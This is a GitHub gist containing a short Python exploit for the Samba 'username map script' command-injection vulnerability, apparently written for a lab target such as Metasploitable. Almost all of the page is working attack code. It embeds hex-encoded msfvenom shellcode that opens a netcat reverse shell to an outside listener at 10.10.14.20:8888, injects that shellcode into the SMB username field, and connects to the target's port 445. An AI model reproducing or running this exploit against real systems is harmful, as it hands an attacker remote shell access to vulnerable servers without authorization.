Skip to content

Instantly share code, notes, and snippets.

@zevlag

zevlag/samba-usermap-exploit.py

Forked from joenorton8014/samba-usermap-exploit.py
Last active November 20, 2019 23:28
Show Gist options

  • Select an option

    Learn more about clone URLs
  • Save zevlag/d3645848ff1ae3f95667828024871a47 to your computer and use it in GitHub Desktop.

Select an option

Learn more about clone URLs
Save zevlag/d3645848ff1ae3f95667828024871a47 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
samba-usermap-exploit.py
#!/usr/bin/python
from smb.SMBConnection import SMBConnection
import random, string
from smb import smb_structs
smb_structs.SUPPORT_SMB2 = False
import sys
# Just a python version of a very simple Samba exploit.
# It doesn't have to be pretty because the shellcode is executed
# in the username field.
# Based off this Metasploit module - https://www.exploit-db.com/exploits/16320/
# Configured SMB connection options with info from here:
# https://pythonhosted.org/pysmb/api/smb_SMBConnection.html
# Use the commandline argument as the target:
if len(sys.argv) < 2:
print "\nUsage: " + sys.argv[0] + " <HOST>\n"
sys.exit()
# Shellcode:
# msfvenom -p cmd/unix/reverse_netcat LHOST=10.10.14.20 LPORT=8888 -f python
buf = b""
buf += b"\x6d\x6b\x66\x69\x66\x6f\x20\x2f\x74\x6d\x70\x2f\x73"
buf += b"\x69\x71\x76\x3b\x20\x6e\x63\x20\x31\x30\x2e\x31\x30"
buf += b"\x2e\x31\x34\x2e\x32\x30\x20\x38\x38\x38\x38\x20\x30"
buf += b"\x3c\x2f\x74\x6d\x70\x2f\x73\x69\x71\x76\x20\x7c\x20"
buf += b"\x2f\x62\x69\x6e\x2f\x73\x68\x20\x3e\x2f\x74\x6d\x70"
buf += b"\x2f\x73\x69\x71\x76\x20\x32\x3e\x26\x31\x3b\x20\x72"
buf += b"\x6d\x20\x2f\x74\x6d\x70\x2f\x73\x69\x71\x76"
username = "/=`nohup " + buf + "`"
password = ""
conn = SMBConnection(username, password, "SOMEBODYHACKINGYOU" , "METASPLOITABLE", use_ntlm_v2 = False)
assert conn.connect(sys.argv[1], 445)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment